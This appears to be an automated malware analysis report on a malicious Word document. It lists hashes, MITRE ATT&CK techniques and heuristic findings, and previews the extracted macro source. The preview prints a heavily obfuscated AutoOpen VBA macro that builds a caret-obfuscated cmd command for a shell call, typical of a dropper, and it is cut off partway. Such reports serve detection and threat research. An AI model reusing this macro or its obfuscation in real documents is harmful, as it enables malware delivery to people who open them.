Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ebb6e0800b1f4f25…

MALICIOUS

Office (OLE)

Size: 157.4 KB
Created: 2018-09-24 06:19:00
Authoring application: Microsoft Office Word
First seen: 2020-05-25
MD5: 726a3705ac61fc3bf48533b4d16f190f
SHA-1: 4cdbe9ce412a692f44f7fb82aed11d1ee43732b6
SHA-256: ebb6e0800b1f4f252c8e7e6c3893d792a0698065cde0ea011c951660825645ef
Risk Score: 182

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1059 Command and Scripting Interpreter
  • T1204.002 User Execution: Malicious File

The sample is a malicious Office document containing a VBA macro. The AutoOpen macro executes a command through the Shell() function, which is a strong indicator of downloader or dropper functionality. The macro is heavily obfuscated, so the exact payload and its destination could not be determined statically; the malware family is therefore unknown.

Heuristics (6)

  • VBA macros detected [medium] (3 related findings) OLE_VBA_MACROS
    Document contains VBA macro code.
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    The VBA code calls Shell().
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    The VBA project defines an AutoOpen macro, which runs automatically when the document is opened.
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 126715 bytes
SHA-256: 43aa01baf7ff30a2eb78e3edf3989012ba6f1a0a6e74bc922fe7e11a2097cf4e

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ToMzNnSz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   Dim vtDFsb(2)
vtDFsb(0) = Mid(HcCjHwGuBd + RTzpokiulPkwOXdBEIwTrOcNm + sWLjRcvNRHwHdV, 234, 353) + Left(bcudbUrUzFbMW + ztsYQzvhnGuBSwfwLjzOvqpwcp + kFcdcTt, 418)
vtDFsb(1) = MidB(uHXhNpCBafV + vAizhbATrBBBYoVMYfosqNczua + iiYjdzV, 230, 894) + Left(CFWYLRNj + BdAHHokEcGsvSadrKXadSlnToRhhuAd + XZWJkHS, 792) + MidB(JDwiZCIXmbz + UUwnuZzbSlFSoOGjwLdQqiIimcqFG + CooTYQW, 965, 838) + Right(dHNtRDTLjKq + FluLzbfPOmZSPbNlzLEBQsL + vGtLkhOmVLzP, 762)
   Dim sUAIG(2)
sUAIG(0) = Right(pEMnrHvXjjr + rLbKAcMChvFOuUAlYqkBQrwADw + MclThsqI, 569) + Mid(IXQicMbXAFF + GJLSBcJFFZddbnHsVPbiAIWocZa + TRNXhXHB, 866, 398)
sUAIG(1) = Left(jFzlnPIjzmEifK + ohjiXcJLNPaOHcuYjXCoJRSJ + jsWNcMMnY, 509) + Left(nXYooVqJJFwqGH + XMESdwiXEHmuQAGPIjUdzTWDdtf + aTQLVlSptA, 703)
   Dim aGsEU(2)
aGsEU(0) = Mid(zYJOZhkPXkQA + FuopaSYZiOoLVrzhkIhiBORhGcpUsnlU + OuQNauu, 319, 705) + MidB(XaCjrAiXP + JlRwpuFBaAfTqsbUnklSiCmoAnGwwRnli + FAKjvNshjpz, 480, 195)
aGsEU(1) = Right(BzNSjtCFEOT + bjENfqijauzEUDwBOwMQXMMkCuGVbJJGD + tTBwbCNNsZzG, 61) + MidB(sSLqhBTGfo + YvhOzNQVcKonJwTLCVERqvMDjZNVH + pSLKztmiuhw, 443, 66)
   Dim bUznkn(2)
bUznkn(0) = Right(FHuAkdTnotSIUb + BwCQOVJvqIpXzBIwwnOCrsLauzGY + PmokrjjzwJc, 767) + MidB(prKJYVMwnuK + uOwkjqsNNXHNWfoDwjlCmwziS + tZTjoiAZszCjci, 753, 38) + Mid(jIiUGbTJMLnjLa + TznjiwofjuDJYzflKPYSsNiWplI + CNLpOiQkUDo, 16, 630) + Left(nLsujoS + fvTDZwtXTSAwNKKPBqMkSijdtNFnjOQKSKM + KQjOPDaBLk, 329)
bUznkn(1) = MidB(mKNjWYqVAKO + hwzOACqVBlzhaIboAHbGzinoUz + SkwWiBz, 679, 287) + MidB(kpbmpziu + ZdJFqCfNOWVOSMjEiZkEArQVvzqlF + tGoQozRWAZ, 715, 863)
   Dim AvdAR(2)
AvdAR(0) = Mid(iqSnKjvPoN + UjHADuQqjsYJjSsGqZWnVrM + jitkqtD, 416, 857) + Left(GBNJuzuddw + vGqkwtlIqLJHfqhPdLhApMMsXwiF + hzdAIEcGm, 674) + Right(FdEqNNAnnacGA + AOLIGCszsdhHjakjFwohjUFUaHUXzk + saaooNfLMfG, 537) + Mid(psACRCLjb + iRqYGhWHiJJRDdVENdQNSbXzS + LznnGvpnG, 969, 697)
AvdAR(1) = MidB(ifjisYwiLXaXRE + ijDnqXKWdDwNqPdGTimEuSizbNPorRqX + jGHVNFoaksw, 347, 933) + Mid(VlEufJUHXiINPH + rrzWNbRijPThqCQwqVfjWOwjmErZTo + azukuUa, 202, 292) + MidB(RVZsPYlRNOHaI + iZspztzziQDGbMSUfbNMbBiXfrT + VCpASZquTXqb, 243, 342) + Left(Avnujid + RoRVSGPrQZULAvphWkOjYRiwjiFnZ + AkYYBRbjwjklp, 886)
   Dim zUmvc(1)
zUmvc(0) = MidB(tEnKjNK + wYAKQJLZvBSDnfBnYGSncKfTNGsVlhkoR + oqJMAbjAFZwI, 906, 783) + MidB(MUNBdkpzSDf + CrYHGkPJacOfZuPwzBYUDsDDALtzw + CiaAoEoXlrd, 750, 963)
WtFTlttUE (KeyString(vbKeyC) + KeyString(vbKeyM) + NmJqOmSH + MBGjPnwQzw + UjfXwW + UFzzTiWUPCjO + fnLAXMozIcti)
   Dim ZFFtEc(2)
ZFFtEc(0) = Right(wELYLFlmYZZEL + znjtWzVFpstJwnKVHoozAjMVETFhRjdI + iDtdwWfRLb, 811) + Right(DwWCVIoiK + RmjKcLjohomvLISTlfSEBlujIz + YtQLLmVpzvBD, 512)
ZFFtEc(1) = MidB(bqMpVzmYzwihZ + XoQCOLfzwjzXpdOdktSJvnlUTNdEwHVXN + CjwrQJXEPi, 388, 686) + MidB(fPpcfVPdqLmSbB + SQcFhMWfAXiWmwdQrjvhRIZ + FziWRMQEHzPT, 853, 821) + Right(zhHENIuUkvW + KwIWmthRBQJWWYrzzpwCSmXwDNlVqtV + HwGzONv, 317) + MidB(SmVcmvjYfrUq + wiDQuTcZZkAtrjpUEFJhlwa + qFiQMrAkJf, 416, 588)
End Sub
Attribute VB_Name = "NArmCpopTJVfJ"
Function NmJqOmSH()
Dim ZIwPGl(1)
ZIwPGl(0) = Right(mbrltzlpkQzpi + OOrINljFkEIciMkOzBltCQVZCWAhR + wSjmpGFWwApp, 165) + MidB(jkknZGdUor + ijsDmPtjEbQkrimtMOfpQziTdVz + zubnGwCZPidcJT, 44, 642) + Right(bbRfwztbGHwQK + jSqQrfzKzjBNHlCiWQdSvcti + cwUhPcBLRjLdQP, 651) + MidB(jUdiKOjZvDAvnz + OYwOUzicUSTtAOfNJMQSkoHTZ + dlJVBrjAc, 670, 805)
iVIRtdtjtk = "d /V" + "/C" + CStr(Chr(1 + 3 + 0 + 2 + 28)) + "s^e^t " + "^" + "\-=_^" + "-/ ^_^-/ \" + "_/^ ^_^\/^ " + "/_-^ "
Dim UjNLoG(2)
UjNLoG(0) = Right(JcIWYjpQbIH + naWRbmKYDdafiNhCGzJaOFzqMslG + zhJqtMT, 75) + Mid(ZiwszbhdaENC + HLiwztmaZfBErDUEXAkIEs + HfwmzDIj, 654, 666) + Left(zwcEWMw + aFVKwGzXDZDNiRbmizvILwEZYflrwNVh + cwzILfIUtRT, 209) + Mid(izbhETKOtjbr + HzNwrzKjzmzqqDmGNDClncGSNFQhTNaNt + TdYuzokOqT, 216, 132)
UjNLoG(
... (truncated)